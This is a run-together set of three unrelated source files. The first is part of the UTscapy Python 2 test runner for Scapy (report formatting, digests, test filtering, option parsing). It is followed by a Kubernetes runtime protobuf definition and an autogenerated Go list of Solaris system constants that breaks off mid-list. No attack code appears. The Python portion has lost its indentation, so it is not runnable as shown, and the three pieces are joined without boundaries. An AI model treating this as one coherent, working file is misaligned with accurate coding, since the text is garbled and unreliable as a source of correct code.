print "#"*(len(test_campaign.title)+6)
if test_campaign.sha and test_campaign.crc:
print "CRC=[%(crc)s] SHA=[%(sha)s]" % test_campaign
print "from file %(filename)s" % test_campaign
print
for ts in test_campaign:
if ts.crc:
print "+--[%s]%s(%s)--" % (ts.name,"-"*max(2,80-len(ts.name)-18),ts.crc)
else:
print "+--[%s]%s" % (ts.name,"-"*max(2,80-len(ts.name)-6))
if ts.keywords:
print " kw=%s" % ",".join(ts.keywords)
for t in ts:
print "%(num)03i %(name)s" % t
c = k = ""
if t.keywords:
k = "kw=%s" % ",".join(t.keywords)
if t.crc:
c = "[%(crc)s] " % t
if c or k:
print " %s%s" % (c,k)
#### COMPUTE CAMPAIGN DIGESTS ####
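# Each test gets a CRC32 of its stripped code, each test set a CRC32 over the
# concatenation of its tests' code, and the campaign a CRC32 over everything
# plus a SHA1 of the raw campaign file.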
def crc32(x):
return "%08X" % (0xffffffffL & zlib.crc32(x))
def sha1(x):
return sha.sha(x).hexdigest().upper()
def compute_campaign_digests(test_campaign):
dc = ""
for ts in test_campaign:
dts = ""
for t in ts:
dt = t.test.strip()
t.crc = crc32(dt)
dts += "\0"+dt
ts.crc = crc32(dts)
dc += "\0\x01"+dts
test_campaign.crc = crc32(dc)
test_campaign.sha = sha1(open(test_campaign.filename).read())
#### FILTER CAMPAIGN #####
def filter_tests_on_numbers(test_campaign, num):
if num:
for ts in test_campaign:
ts.set = filter(lambda t: t.num in num, ts.set)
test_campaign.campaign = filter(lambda ts: len(ts.set) > 0, test_campaign.campaign)
def filter_tests_keep_on_keywords(test_campaign, kw):
def kw_match(lst, kw):
for k in lst:
if k in kw:
return True
return False
if kw:
for ts in test_campaign:
ts.set = filter(lambda t: kw_match(t.keywords, kw), ts.set)
def filter_tests_remove_on_keywords(test_campaign, kw):
def kw_match(lst, kw):
for k in kw:
if k not in lst:
return False
return True
if kw:
for ts in test_campaign:
ts.set = filter(lambda t: not kw_match(t.keywords, kw), ts.set)
def remove_empty_testsets(test_campaign):
test_campaign.campaign = filter(lambda ts: len(ts.set) > 0, test_campaign.campaign)
#### RUN CAMPAIGN #####
def run_campaign(test_campaign, get_interactive_session, verb=2):
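    # get_interactive_session(code) is expected to return a pair
    # (captured_output, result_value); a result of None or any true value
    # counts as a pass.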
passed=failed=0
if test_campaign.preexec:
test_campaign.preexec_output = get_interactive_session(test_campaign.preexec.strip())[0]
for testset in test_campaign:
for t in testset:
t.output,res = get_interactive_session(t.test.strip())
the_res = False
try:
if res is None or res:
                    the_res = True
except Exception,msg:
t.output+="UTscapy: Error during result interpretation:\n"
t.output+="".join(traceback.format_exception(sys.exc_type, sys.exc_value, sys.exc_traceback,))
if the_res:
t.res = True
res = "passed"
passed += 1
else:
t.res = False
res = "failed"
failed += 1
t.result = res
if verb > 1:
print >>sys.stderr,"%(result)6s %(crc)s %(name)s" % t
test_campaign.passed = passed
test_campaign.failed = failed
if verb:
print >>sys.stderr,"Campaign CRC=%(crc)s SHA=%(sha)s" % test_campaign
print >>sys.stderr,"PASSED=%i FAILED=%i" % (passed, failed)
#### INFO LINES ####
def info_line(test_campaign):
filename = test_campaign.filename
if filename is None:
return "Run %s by UTscapy" % time.ctime()
else:
return "Run %s from [%s] by UTscapy" % (time.ctime(), filename)
def html_info_line(test_campaign):
filename = test_campaign.filename
if filename is None:
return """Run %s by <a href="http://www.secdev.org/projects/UTscapy/">UTscapy</a><br>""" % time.ctime()
else:
return """Run %s from [%s] by <a href="http://www.secdev.org/projects/UTscapy/">UTscapy</a><br>""" % (time.ctime(), filename)
#### CAMPAIGN TO something ####
def campaign_to_TEXT(test_campaign):
output="%(title)s\n" % test_campaign
output += "-- "+info_line(test_campaign)+"\n\n"
output += "Passed=%(passed)i\nFailed=%(failed)i\n\n%(headcomments)s\n" % test_campaign
for testset in test_campaign:
output += "######\n## %(name)s\n######\n%(comments)s\n\n" % testset
for t in testset:
if t.expand:
output += "###(%(num)03i)=[%(result)s] %(name)s\n%(comments)s\n%(output)s\n\n" % t
return output
def campaign_to_ANSI(test_campaign):
output="%(title)s\n" % test_campaign
output += "-- "+info_line(test_campaign)+"\n\n"
output += "Passed=%(passed)i\nFailed=%(failed)i\n\n%(headcomments)s\n" % test_campaign
for testset in test_campaign:
output += "######\n## %(name)s\n######\n%(comments)s\n\n" % testset
for t in testset:
if t.expand:
output += "###(%(num)03i)=[%(result)s] %(name)s\n%(comments)s\n%(output)s\n\n" % t
return output
def campaign_to_xUNIT(test_campaign):
output='<?xml version="1.0" encoding="UTF-8" ?>\n<testsuite>\n'
for testset in test_campaign:
for t in testset:
output += ' <testcase classname="%s"\n' % testset.name.encode("string_escape").replace('"',' ')
output += ' name="%s"\n' % t.name.encode("string_escape").replace('"',' ')
            output += ' duration="0">\n'
if not t.res:
output += '<error><![CDATA[%(output)s]]></error>\n' % t
output += "</testcase>\n"
output += '</testsuite>'
return output
def campaign_to_HTML(test_campaign, local=0):
output = """<html>
<head>
<title>%(title)s</title>
<link rel="stylesheet" href="%%(UTscapy_css)s" type="text/css">
<script language="JavaScript" src="%%(UTscapy_js)s" type="text/javascript"></script>
</head>
<body>
<h1>%(title)s</h1>
<span class=button onClick="hide_all('tst')">Shrink All</span>
<span class=button onClick="show_all('tst')">Expand All</span>
<span class=button onClick="show_passed('tst')">Expand Passed</span>
<span class=button onClick="show_failed('tst')">Expand Failed</span>
<p>
""" % test_campaign
if local:
External_Files.UTscapy_js.write(os.path.dirname(test_campaign.output_file.name))
External_Files.UTscapy_css.write(os.path.dirname(test_campaign.output_file.name))
output %= External_Files.get_local_dict()
else:
output %= External_Files.get_URL_dict()
if test_campaign.crc is not None and test_campaign.sha is not None:
output += "CRC=<span class=crc>%(crc)s</span> SHA=<span class=crc>%(sha)s</span><br>" % test_campaign
output += "<small><em>"+html_info_line(test_campaign)+"</em></small>"
output += test_campaign.headcomments + "\n<p>PASSED=%(passed)i FAILED=%(failed)i<p>\n\n" % test_campaign
for ts in test_campaign:
for t in ts:
output += """<span class=button%(result)s onClick="goto_id('tst%(num)il')">%(num)03i</span>\n""" % t
output += "\n\n"
for testset in test_campaign:
output += "<h2>" % testset
if testset.crc is not None:
output += "<span class=crc>%(crc)s</span> " % testset
output += "%(name)s</h2>\n%(comments)s\n<ul>\n" % testset
for t in testset:
output += """<li class=%(result)s id="tst%(num)il">\n""" % t
if t.expand == 2:
output +="""
<span id="tst%(num)i+" class="button%(result)s" onClick="show('tst%(num)i')" style="POSITION: absolute; VISIBILITY: hidden;">+%(num)03i+</span>
<span id="tst%(num)i-" class="button%(result)s" onClick="hide('tst%(num)i')">-%(num)03i-</span>
""" % t
else:
output += """
<span id="tst%(num)i+" class="button%(result)s" onClick="show('tst%(num)i')">+%(num)03i+</span>
<span id="tst%(num)i-" class="button%(result)s" onClick="hide('tst%(num)i')" style="POSITION: absolute; VISIBILITY: hidden;">-%(num)03i-</span>
""" % t
if t.crc is not None:
output += "<span class=crc>%(crc)s</span>\n" % t
output += """%(name)s\n<span class="comment %(result)s" id="tst%(num)i" """ % t
if t.expand < 2:
output += """ style="POSITION: absolute; VISIBILITY: hidden;" """
output += """><br>%(comments)s
<pre>
%(output)s</pre></span>
""" % t
output += "\n</ul>\n\n"
output += "</body></html>"
return output
def campaign_to_LATEX(test_campaign):
output = r"""\documentclass{report}
\usepackage{alltt}
\usepackage{xcolor}
\usepackage{a4wide}
\usepackage{hyperref}
\title{%(title)s}
\date{%%s}
\begin{document}
\maketitle
\tableofcontents
\begin{description}
\item[Passed:] %(passed)i
\item[Failed:] %(failed)i
\end{description}
%(headcomments)s
""" % test_campaign
output %= info_line(test_campaign)
for testset in test_campaign:
output += "\\chapter{%(name)s}\n\n%(comments)s\n\n" % testset
for t in testset:
if t.expand:
output += r"""\section{%(name)s}
[%(num)03i] [%(result)s]
%(comments)s
\begin{alltt}
%(output)s
\end{alltt}
""" % t
output += "\\end{document}\n"
return output
#### USAGE ####
def usage():
print >>sys.stderr,"""Usage: UTscapy [-m module] [-f {text|ansi|HTML|LaTeX}] [-o output_file]
[-t testfile] [-k keywords [-k ...]] [-K keywords [-K ...]]
[-l] [-d|-D] [-F] [-q[q]] [-P preexecute_python_code]
               [-s /path/to/scapy]
-l\t\t: generate local files
-F\t\t: expand only failed tests
-d\t\t: dump campaign
-D\t\t: dump campaign and stop
-C\t\t: don't calculate CRC and SHA
-s\t\t: path to scapy.py
-q\t\t: quiet mode
-qq\t\t: [silent mode]
-n <testnum>\t: only tests whose numbers are given (eg. 1,3-7,12)
-m <module>\t: additional module to put in the namespace
-k <kw1>,<kw2>,...\t: include only tests with one of those keywords (can be used many times)
-K <kw1>,<kw2>,...\t: remove tests with one of those keywords (can be used many times)
-P <preexecute_python_code>
"""
raise SystemExit
#### MAIN ####
def main(argv):
import __builtin__
# Parse arguments
FORMAT = Format.ANSI
TESTFILE = sys.stdin
OUTPUTFILE = sys.stdout
LOCAL = 0
NUM=None
KW_OK = []
KW_KO = []
DUMP = 0
CRC = 1
ONLYFAILED = 0
VERB=2
PREEXEC=""
SCAPY="scapy"
MODULES = []
try:
opts = getopt.getopt(argv, "o:t:f:hln:m:k:K:DdCFqP:s:")
for opt,optarg in opts[0]:
if opt == "-h":
usage()
elif opt == "-F":
ONLYFAILED = 1
elif opt == "-q":
VERB -= 1
elif opt == "-D":
DUMP = 2
elif opt == "-d":
DUMP = 1
elif opt == "-C":
CRC = 0
elif opt == "-s":
SCAPY = optarg
elif opt == "-P":
PREEXEC += "\n"+optarg
elif opt == "-f":
try:
FORMAT = Format.from_string(optarg)
except KeyError,msg:
raise getopt.GetoptError("Unknown output format %s" % msg)
elif opt == "-t":
TESTFILE = open(optarg)
elif opt == "-o":
OUTPUTFILE = open(optarg, "w")
elif opt == "-l":
LOCAL = 1
elif opt == "-n":
NUM = []
for v in map( lambda x: x.strip(), optarg.split(",") ):
try:
NUM.append(int(v))
except ValueError:
v1,v2 = map(int, v.split("-"))
for vv in range(v1,v2+1):
NUM.append(vv)
elif opt == "-m":
MODULES.append(optarg)
elif opt == "-k":
KW_OK.append(optarg.split(","))
elif opt == "-K":
KW_KO.append(optarg.split(","))
try:
from scapy import all as scapy
except ImportError,e:
raise getopt.GetoptError("cannot import [%s]: %s" % (SCAPY,e))
for m in MODULES:
try:
mod = import_module(m)
__builtin__.__dict__.update(mod.__dict__)
except ImportError,e:
raise getopt.GetoptError("cannot import [%s]: %s" % (m,e))
except getopt.GetoptError,msg:
print >>sys.stderr,"ERROR:",msg
raise SystemExit
autorun_func = {
Format.TEXT: scapy.autorun_get_text_interactive_session,
Format.ANSI: scapy.autorun_get_ansi_interactive_session,
Format.HTML: scapy.autorun_get_html_interactive_session,
Format.LATEX: scapy.autorun_get_latex_interactive_session,
Format.XUNIT: scapy.autorun_get_text_interactive_session,
}
# Parse test file
test_campaign = parse_campaign_file(TESTFILE)
# Report parameters
if PREEXEC:
test_campaign.preexec = PREEXEC
# Compute campaign CRC and SHA
if CRC:
compute_campaign_digests(test_campaign)
# Filter out unwanted tests
filter_tests_on_numbers(test_campaign, NUM)
for k in KW_OK:
filter_tests_keep_on_keywords(test_campaign, k)
for k in KW_KO:
filter_tests_remove_on_keywords(test_campaign, k)
remove_empty_testsets(test_campaign)
# Dump campaign
if DUMP:
dump_campaign(test_campaign)
if DUMP > 1:
sys.exit()
# Run tests
test_campaign.output_file = OUTPUTFILE
run_campaign(test_campaign, autorun_func[FORMAT], verb=VERB)
# Shrink passed
if ONLYFAILED:
for t in test_campaign.all_tests():
if t:
t.expand = 0
else:
t.expand = 2
# Generate report
if FORMAT == Format.TEXT:
output = campaign_to_TEXT(test_campaign)
elif FORMAT == Format.ANSI:
output = campaign_to_ANSI(test_campaign)
elif FORMAT == Format.HTML:
output = campaign_to_HTML(test_campaign, local=LOCAL)
elif FORMAT == Format.LATEX:
output = campaign_to_LATEX(test_campaign)
elif FORMAT == Format.XUNIT:
output = campaign_to_xUNIT(test_campaign)
OUTPUTFILE.write(output)
OUTPUTFILE.close()
if __name__ == "__main__":
main(sys.argv[1:])
/*
Copyright The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
// This file was autogenerated by go-to-protobuf. Do not edit it manually!
syntax = 'proto2';
package k8s.io.apimachinery.pkg.runtime;
// Package-wide variables from generator "generated".
option go_package = "runtime";
// RawExtension is used to hold extensions in external versions.
//
// To use this, make a field which has RawExtension as its type in your external, versioned
// struct, and Object in your internal struct. You also need to register your
// various plugin types.
//
// // Internal package:
// type MyAPIObject struct {
// runtime.TypeMeta `json:",inline"`
// MyPlugin runtime.Object `json:"myPlugin"`
// }
// type PluginA struct {
// AOption string `json:"aOption"`
// }
//
// // External package:
// type MyAPIObject struct {
// runtime.TypeMeta `json:",inline"`
// MyPlugin runtime.RawExtension `json:"myPlugin"`
// }
// type PluginA struct {
// AOption string `json:"aOption"`
// }
//
// // On the wire, the JSON will look something like this:
// {
// "kind":"MyAPIObject",
// "apiVersion":"v1",
// "myPlugin": {
// "kind":"PluginA",
// "aOption":"foo",
// },
// }
//
// So what happens? Decode first uses json or yaml to unmarshal the serialized data into
// your external MyAPIObject. That causes the raw JSON to be stored, but not unpacked.
// The next step is to copy (using pkg/conversion) into the internal struct. The runtime
// package's DefaultScheme has conversion functions installed which will unpack the
// JSON stored in RawExtension, turning it into the correct object type, and storing it
// in the Object. (TODO: In the case where the object is of an unknown type, a
// runtime.Unknown object will be created and stored.)
//
// +k8s:deepcopy-gen=true
// +protobuf=true
// +k8s:openapi-gen=true
message RawExtension {
// Raw is the underlying serialization of this object.
//
// TODO: Determine how to detect ContentType and ContentEncoding of 'Raw' data.
optional bytes raw = 1;
}
// TypeMeta is shared by all top level objects. The proper way to use it is to inline it in your type,
// like this:
// type MyAwesomeAPIObject struct {
// runtime.TypeMeta `json:",inline"`
// ... // other fields
// }
// func (obj *MyAwesomeAPIObject) SetGroupVersionKind(gvk *metav1.GroupVersionKind) { metav1.UpdateTypeMeta(obj,gvk) }; GroupVersionKind() *GroupVersionKind
//
// TypeMeta is provided here for convenience. You may use it directly from this package or define
// your own with the same fields.
//
// +k8s:deepcopy-gen=false
// +protobuf=true
// +k8s:openapi-gen=true
message TypeMeta {
// +optional
optional string apiVersion = 1;
// +optional
optional string kind = 2;
}
// Unknown allows api objects with unknown types to be passed-through. This can be used
// to deal with the API objects from a plug-in. Unknown objects still have functioning
// TypeMeta features-- kind, version, etc.
// TODO: Make this object have easy access to field based accessors and settors for
// metadata and field mutation.
//
// +k8s:deepcopy-gen=true
// +k8s:deepcopy-gen:interfaces=k8s.io/apimachinery/pkg/runtime.Object
// +protobuf=true
// +k8s:openapi-gen=true
message Unknown {
optional TypeMeta typeMeta = 1;
// Raw will hold the complete serialized object which couldn't be matched
// with a registered type. Most likely, nothing should be done with this
// except for passing it through the system.
optional bytes raw = 2;
// ContentEncoding is encoding used to encode 'Raw' data.
// Unspecified means no encoding.
optional string contentEncoding = 3;
// ContentType is serialization method used to serialize 'Raw'.
// Unspecified means ContentTypeJSON.
optional string contentType = 4;
}
// mkerrors.sh -m64
// Code generated by the command above; see README.md. DO NOT EDIT.
// +build amd64,solaris
// Created by cgo -godefs - DO NOT EDIT
// cgo -godefs -- -m64 _const.go
package unix
import "syscall"
const (
AF_802 = 0x12
AF_APPLETALK = 0x10
AF_CCITT = 0xa
AF_CHAOS = 0x5
AF_DATAKIT = 0x9
AF_DECnet = 0xc
AF_DLI = 0xd
AF_ECMA = 0x8
AF_FILE = 0x1
AF_GOSIP = 0x16
AF_HYLINK = 0xf
AF_IMPLINK = 0x3
AF_INET = 0x2
AF_INET6 = 0x1a
AF_INET_OFFLOAD = 0x1e
AF_IPX = 0x17
AF_KEY = 0x1b
AF_LAT = 0xe
AF_LINK = 0x19
AF_LOCAL = 0x1
AF_MAX = 0x20
AF_NBS = 0x7
AF_NCA = 0x1c
AF_NIT = 0x11
AF_NS = 0x6
AF_OSI = 0x13
AF_OSINET = 0x15
AF_PACKET = 0x20
AF_POLICY = 0x1d
AF_PUP = 0x4
AF_ROUTE = 0x18
AF_SNA = 0xb
AF_TRILL = 0x1f
AF_UNIX = 0x1
AF_UNSPEC = 0x0
AF_X25 = 0x14
ARPHRD_ARCNET = 0x7
ARPHRD_ATM = 0x10
ARPHRD_AX25 = 0x3
ARPHRD_CHAOS = 0x5
ARPHRD_EETHER = 0x2
ARPHRD_ETHER = 0x1
ARPHRD_FC = 0x12
ARPHRD_FRAME = 0xf
ARPHRD_HDLC = 0x11
ARPHRD_IB = 0x20
ARPHRD_IEEE802 = 0x6
ARPHRD_IPATM = 0x13
ARPHRD_METRICOM = 0x17
ARPHRD_TUNNEL = 0x1f
B0 = 0x0
B110 = 0x3
B115200 = 0x12
B1200 = 0x9
B134 = 0x4
B150 = 0x5
B153600 = 0x13
B1800 = 0xa
B19200 = 0xe
B200 = 0x6
B230400 = 0x14
B2400 = 0xb
B300 = 0x7
B307200 = 0x15
B38400 = 0xf
B460800 = 0x16
B4800 = 0xc
B50 = 0x1
B57600 = 0x10
B600 = 0x8
B75 = 0x2
B76800 = 0x11
B921600 = 0x17
B9600 = 0xd
BIOCFLUSH = 0x20004268
BIOCGBLEN = 0x40044266
BIOCGDLT = 0x4004426a
BIOCGDLTLIST = -0x3fefbd89
BIOCGDLTLIST32 = -0x3ff7bd89
BIOCGETIF = 0x4020426b
BIOCGETLIF = 0x4078426b
BIOCGHDRCMPLT = 0x40044274
BIOCGRTIMEOUT = 0x4010427b
BIOCGRTIMEOUT32 = 0x4008427b
BIOCGSEESENT = 0x40044278
BIOCGSTATS = 0x4080426f
BIOCGSTATSOLD = 0x4008426f
BIOCIMMEDIATE = -0x7ffbbd90
BIOCPROMISC = 0x20004269
BIOCSBLEN = -0x3ffbbd9a
BIOCSDLT = -0x7ffbbd8a
BIOCSETF = -0x7fefbd99
BIOCSETF32 = -0x7ff7bd99
BIOCSETIF = -0x7fdfbd94
BIOCSETLIF = -0x7f87bd94
BIOCSHDRCMPLT = -0x7ffbbd8b
BIOCSRTIMEOUT = -0x7fefbd86
BIOCSRTIMEOUT32 = -0x7ff7bd86
BIOCSSEESENT = -0x7ffbbd87
BIOCSTCPF = -0x7fefbd8e
BIOCSUDPF = -0x7fefbd8d
BIOCVERSION = 0x40044271
BPF_A = 0x10
BPF_ABS = 0x20
BPF_ADD = 0x0
BPF_ALIGNMENT = 0x4
BPF_ALU = 0x4
BPF_AND = 0x50
BPF_B = 0x10
BPF_DFLTBUFSIZE = 0x100000
BPF_DIV = 0x30
BPF_H = 0x8
BPF_IMM = 0x0
BPF_IND = 0x40
BPF_JA = 0x0
BPF_JEQ = 0x10
BPF_JGE = 0x30
BPF_JGT = 0x20
BPF_JMP = 0x5
BPF_JSET = 0x40
BPF_K = 0x0
BPF_LD = 0x0
BPF_LDX = 0x1
BPF_LEN = 0x80
BPF_LSH = 0x60
BPF_MAJOR_VERSION = 0x1
BPF_MAXBUFSIZE = 0x1000000
BPF_MAXINSNS = 0x200
BPF_MEM = 0x60
BPF_MEMWORDS = 0x10
BPF_MINBUFSIZE = 0x20
BPF_MINOR_VERSION = 0x1
BPF_MISC = 0x7
BPF_MSH = 0xa0
BPF_MUL = 0x20
BPF_NEG = 0x80
BPF_OR = 0x40
BPF_RELEASE = 0x30bb6
BPF_RET = 0x6
BPF_RSH = 0x70
BPF_ST = 0x2
BPF_STX = 0x3
BPF_SUB = 0x10
BPF_TAX = 0x0
BPF_TXA = 0x80
BPF_W = 0x0
BPF_X = 0x8
BRKINT = 0x2
BS0 = 0x0
BS1 = 0x2000
BSDLY = 0x2000
CBAUD = 0xf
CFLUSH = 0xf
CIBAUD = 0xf0000
CLOCAL = 0x800
CLOCK_HIGHRES = 0x4
CLOCK_LEVEL = 0xa
CLOCK_MONOTONIC = 0x4
CLOCK_PROCESS_CPUTIME_ID = 0x5
CLOCK_PROF = 0x2
CLOCK_REALTIME = 0x3
CLOCK_THREAD_CPUTIME_ID = 0x2
CLOCK_VIRTUAL = 0x1
CR0 = 0x0
CR1 = 0x200
CR2 = 0x400
CR3 = 0x600
CRDLY = 0x600
CREAD = 0x80
CRTSCTS = 0x80000000
CS5 = 0x0
CS6 = 0x10
CS7 = 0x20
CS8 = 0x30
CSIZE = 0x30
CSTART = 0x11
CSTATUS = 0x14
CSTOP = 0x13
CSTOPB = 0x40
CSUSP = 0x1a
CSWTCH = 0x1a
DLT_AIRONET_HEADER = 0x78
DLT_APPLE_IP_OVER_IEEE1394 = 0x8a
DLT_ARCNET = 0x7
DLT_ARCNET_LINUX = 0x81
DLT_ATM_CLIP = 0x13
DLT_ATM_RFC1483 = 0xb
DLT_AURORA = 0x7e
DLT_AX25 = 0x3
DLT_BACNET_MS_TP = 0xa5
DLT_CHAOS = 0x5
DLT_CISCO_IOS = 0x76
DLT_C_HDLC = 0x68
DLT_DOCSIS = 0x8f
DLT_ECONET = 0x73
DLT_EN10MB = 0x1
DLT_EN3MB = 0x2
DLT_ENC = 0x6d
DLT_ERF_ETH = 0xaf
DLT_ERF_POS = 0xb0
DLT_FDDI = 0xa
DLT_FRELAY = 0x6b
DLT_GCOM_SERIAL = 0xad
DLT_GCOM_T1E1 = 0xac
DLT_GPF_F = 0xab
DLT_GPF_T = 0xaa
DLT_GPRS_LLC = 0xa9
DLT_HDLC = 0x10
DLT_HHDLC = 0x79
DLT_HIPPI = 0xf
DLT_IBM_SN = 0x92
DLT_IBM_SP = 0x91
DLT_IEEE802 = 0x6
DLT_IEEE802_11 = 0x69
DLT_IEEE802_11_RADIO = 0x7f
DLT_IEEE802_11_RADIO_AVS = 0xa3
DLT_IPNET = 0xe2
DLT_IPOIB = 0xa2
DLT_IP_OVER_FC = 0x7a
DLT_JUNIPER_ATM1 = 0x89
DLT_JUNIPER_ATM2 = 0x87
DLT_JUNIPER_CHDLC = 0xb5
DLT_JUNIPER_ES = 0x84
DLT_JUNIPER_ETHER = 0xb2
DLT_JUNIPER_FRELAY = 0xb4
DLT_JUNIPER_GGSN = 0x85
DLT_JUNIPER_MFR = 0x86
DLT_JUNIPER_MLFR = 0x83
DLT_JUNIPER_MLPPP = 0x82
DLT_JUNIPER_MONITOR = 0xa4
DLT_JUNIPER_PIC_PEER = 0xae
DLT_JUNIPER_PPP = 0xb3
DLT_JUNIPER_PPPOE = 0xa7
DLT_JUNIPER_PPPOE_ATM = 0xa8
DLT_JUNIPER_SERVICES = 0x88
DLT_LINUX_IRDA = 0x90
DLT_LINUX_LAPD = 0xb1
DLT_LINUX_SLL = 0x71
DLT_LOOP = 0x6c
DLT_LTALK = 0x72
DLT_MTP2 = 0x8c
DLT_MTP2_WITH_PHDR = 0x8b
DLT_MTP3 = 0x8d
DLT_NULL = 0x0
DLT_PCI_EXP = 0x7d
DLT_PFLOG = 0x75
DLT_PFSYNC = 0x12
DLT_PPP = 0x9
DLT_PPP_BSDOS = 0xe
DLT_PPP_PPPD = 0xa6
DLT_PRISM_HEADER = 0x77
DLT_PRONET = 0x4
DLT_RAW = 0xc
DLT_RAWAF_MASK = 0x2240000
DLT_RIO = 0x7c
DLT_SCCP = 0x8e
DLT_SLIP = 0x8
DLT_SLIP_BSDOS = 0xd
DLT_SUNATM = 0x7b
DLT_SYMANTEC_FIREWALL = 0x63
DLT_TZSP = 0x80
ECHO = 0x8
ECHOCTL = 0x200
ECHOE = 0x10
ECHOK = 0x20
ECHOKE = 0x800
ECHONL = 0x40
ECHOPRT = 0x400
EMPTY_SET = 0x0
EMT_CPCOVF = 0x1
EQUALITY_CHECK = 0x0
EXTA = 0xe
EXTB = 0xf
FD_CLOEXEC = 0x1
FD_NFDBITS = 0x40
FD_SETSIZE = 0x10000
FF0 = 0x0
FF1 = 0x8000
FFDLY = 0x8000
FLUSHALL = 0x1
FLUSHDATA = 0x0
FLUSHO = 0x2000
F_ALLOCSP = 0xa
F_ALLOCSP64 = 0xa
F_BADFD = 0x2e
F_BLKSIZE = 0x13
F_BLOCKS = 0x12
F_CHKFL = 0x8
F_COMPAT = 0x8
F_DUP2FD = 0x9
F_DUP2FD_CLOEXEC = 0x24
F_DUPFD = 0x0
F_DUPFD_CLOEXEC = 0x25
F_FLOCK = 0x35
F_FLOCK64 = 0x35
F_FLOCKW = 0x36
F_FLOCKW64 = 0x36
F_FREESP = 0xb
F_FREESP64 = 0xb
F_GETFD = 0x1
F_GETFL = 0x3
F_GETLK = 0xe
F_GETLK64 = 0xe
F_GETOWN = 0x17
F_GETXFL = 0x2d
F_HASREMOTELOCKS = 0x1a
F_ISSTREAM = 0xd
F_MANDDNY = 0x10
F_MDACC = 0x20
F_NODNY = 0x0
F_NPRIV = 0x10
F_OFD_GETLK = 0x2f
F_OFD_GETLK64 = 0x2f
F_OFD_SETLK = 0x30
F_OFD_SETLK64 = 0x30
F_OFD_SETLKW = 0x31
F_OFD_SETLKW64 = 0x31
F_PRIV = 0xf
F_QUOTACTL = 0x11
F_RDACC = 0x1
F_RDDNY = 0x1
F_RDLCK = 0x1
F_REVOKE = 0x19
F_RMACC = 0x4
F_RMDNY = 0x4
F_RWACC = 0x3
F_RWDNY = 0x3
F_SETFD = 0x2
F_SETFL = 0x4
F_SETLK = 0x6
F_SETLK64 = 0x6
F_SETLK64_NBMAND = 0x2a
F_SETLKW = 0x7
F_SETLKW64 = 0x7
F_SETLK_NBMAND = 0x2a
F_SETOWN = 0x18
F_SHARE = 0x28
F_SHARE_NBMAND = 0x2b
F_UNLCK = 0x3
F_UNLKSYS = 0x4
F_UNSHARE = 0x29
F_WRACC = 0x2
F_WRDNY = 0x2
F_WRLCK = 0x2
HUPCL = 0x400
IBSHIFT = 0x10
ICANON = 0x2
ICRNL = 0x100
IEXTEN = 0x8000
IFF_ADDRCONF = 0x80000
IFF_ALLMULTI = 0x200
IFF_ANYCAST = 0x400000
IFF_BROADCAST = 0x2
IFF_CANTCHANGE = 0x7f203003b5a
IFF_COS_ENABLED = 0x200000000
IFF_DEBUG = 0x4
IFF_DEPRECATED = 0x40000
IFF_DHCPRUNNING = 0x4000
IFF_DUPLICATE = 0x4000000000
IFF_FAILED = 0x10000000
IFF_FIXEDMTU = 0x1000000000
IFF_INACTIVE = 0x40000000
IFF_INTELLIGENT = 0x400
IFF_IPMP = 0x8000000000
IFF_IPMP_CANTCHANGE = 0x10000000
IFF_IPMP_INVALID = 0x1ec200080
IFF_IPV4 = 0x1000000
IFF_IPV6 = 0x2000000
IFF_L3PROTECT = 0x40000000000
IFF_LOOPBACK = 0x8
IFF_MULTICAST = 0x800
IFF_MULTI_BCAST = 0x1000
IFF_NOACCEPT = 0x4000000
IFF_NOARP = 0x80
IFF_NOFAILOVER = 0x8000000
IFF_NOLINKLOCAL = 0x20000000000
IFF_NOLOCAL = 0x20000
IFF_NONUD = 0x200000
IFF_NORTEXCH = 0x800000
IFF_NOTRAILERS = 0x20
IFF_NOXMIT = 0x10000
IFF_OFFLINE = 0x80000000
IFF_POINTOPOINT = 0x10
IFF_PREFERRED = 0x400000000
IFF_PRIVATE = 0x8000
IFF_PROMISC = 0x100
IFF_ROUTER = 0x100000
IFF_RUNNING = 0x40
IFF_STANDBY = 0x20000000
IFF_TEMPORARY = 0x800000000
IFF_UNNUMBERED = 0x2000
IFF_UP = 0x1
IFF_VIRTUAL = 0x2000000000
IFF_VRRP = 0x10000000000
IFF_XRESOLV = 0x100000000
IFNAMSIZ = 0x10
IFT_1822 = 0x2
IFT_6TO4 = 0xca
IFT_AAL5 = 0x31
IFT_ARCNET = 0x23
IFT_ARCNETPLUS = 0x24
IFT_ATM = 0x25
IFT_CEPT = 0x13
IFT_DS3 = 0x1e
IFT_EON = 0x19
IFT_ETHER = 0x6
IFT_FDDI = 0xf
IFT_FRELAY = 0x20
IFT_FRELAYDCE = 0x2c
IFT_HDH1822 = 0x3
IFT_HIPPI = 0x2f
IFT_HSSI = 0x2e
IFT_HY = 0xe
IFT_IB = 0xc7
IFT_IPV4 = 0xc8
IFT_IPV6 = 0xc9
IFT_ISDNBASIC = 0x14
IFT_ISDNPRIMARY = 0x15
IFT_ISO88022LLC = 0x29
IFT_ISO88023 = 0x7
IFT_ISO88024 = 0x8
IFT_ISO88025 = 0x9
IFT_ISO88026 = 0xa
IFT_LAPB = 0x10
IFT_LOCALTALK = 0x2a
IFT_LOOP = 0x18
IFT_MIOX25 = 0x26
IFT_MODEM = 0x30
IFT_NSIP = 0x1b
IFT_OTHER = 0x1
IFT_P10 = 0xc
IFT_P80 = 0xd
IFT_PARA = 0x22
IFT_PPP = 0x17
IFT_PROPMUX = 0x36
IFT_PROPVIRTUAL = 0x35
IFT_PTPSERIAL = 0x16
IFT_RS232 = 0x21
IFT_SDLC = 0x11
IFT_SIP = 0x1f
IFT_SLIP = 0x1c
IFT_SMDSDXI = 0x2b
IFT_SMDSICIP = 0x34
IFT_SONET = 0x27
IFT_SONETPATH = 0x32
IFT_SONETVT = 0x33
IFT_STARLAN = 0xb
IFT_T1 = 0x12
IFT_ULTRA = 0x1d
IFT_V35 = 0x2d
IFT_X25 = 0x5
IFT_X25DDN = 0x4
IFT_X25PLE = 0x28
IFT_XETHER = 0x1a
IGNBRK = 0x1
IGNCR = 0x80
IGNPAR = 0x4
IMAXBEL = 0x2000
INLCR = 0x40
INPCK = 0x10
IN_AUTOCONF_MASK = 0xffff0000
IN_AUTOCONF_NET = 0xa9fe0000
IN_CLASSA_HOST = 0xffffff
